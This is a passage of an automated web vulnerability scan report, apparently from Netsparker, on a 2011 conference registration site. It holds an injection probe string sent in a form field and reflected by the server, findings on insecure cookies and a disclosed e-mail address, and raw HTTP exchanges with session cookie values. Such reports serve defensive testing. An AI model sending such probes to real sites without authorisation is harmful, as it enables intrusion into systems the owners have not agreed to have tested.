Content-Disposition: form-data; name="reference"

3
--f40c1d28f125465fb94f655e798eee46
Content-Disposition: form-data; name="eb"

3
--f40c1d28f125465fb94f655e798eee46
Content-Disposition: form-data; name="admin"

-1
--f40c1d28f125465fb94f655e798eee46
Content-Disposition: form-data; name="bridgeid"

3
--f40c1d28f125465fb94f655e798eee46
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--f40c1d28f125465fb94f655e798eee46
Content-Disposition: form-data; name="discountcode"

3
--f40c1d28f125465fb94f655e798eee46
Content-Disposition: form-data; name="selectcategoryid"

'" ns= netsparker(0x0008BB)
--f40c1d28f125465fb94f655e798eee46
Content-Disposition: form-data; name="x"

0
--f40c1d28f125465fb94f655e798eee46
Content-Disposition: form-data; name="y"

0
-----------------------------7db13e117a156e--
--f40c1d28f125465fb94f655e798eee46--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:32:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=e5tcshr85ciksksmbnnkdnuno2; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 2753
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="\'\" ns= netsparker(0x0008BB) " /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [cat] => 1 [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><input type="hidden" name="selectcategoryid" value="-1" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /ereg/

/ereg/ CONFIRMED

https://www.eiseverywhere.com/ereg/

Identified Cookie

PHPSESSID

Request

GET /ereg/ HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/index.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.eiseverywhere.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:43:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=jrqme1bm9ss43v6155d0st07m6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 26
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /ereg/

/ereg/ CONFIRMED

https://www.eiseverywhere.com/ereg/

Identified Cookie

PHPSESSID

Request

GET /ereg/ HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/index.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.eiseverywhere.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:43:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=jrqme1bm9ss43v6155d0st07m6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 26
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /ereg/popups/catdetails.php

/ereg/popups/catdetails.php

https://www.eiseverywhere.com/ereg/popups/catdetails.php?cat=65413&eventid=19301&

Found E-mails

leonard@eccouncil.org

Request

GET /ereg/popups/catdetails.php?cat=65413&eventid=19301& HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=qosmtd77ajp1nj42p42f419us4
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:43:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 862
Content-Type: text/html; charset=UTF-8


<html><head><title>Press/ Media Pass</title><script language="javascript" type="text/javascript" src="/ereg/include/scripts.js"></script><style type="text/css">html,body { margin:5px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style></head><body><table width="100%" height="100%" cellspacing="0" cellpadding="15" bgcolor="#ffffff"><tr><td valign="top"><p><b>Press/ Media Pass</b></p><p>Only IF you are a from the media or press. Write to leonard@eccouncil.org for a registration code.

Verification is REQUIRED. </p></td></tr></table></body></html>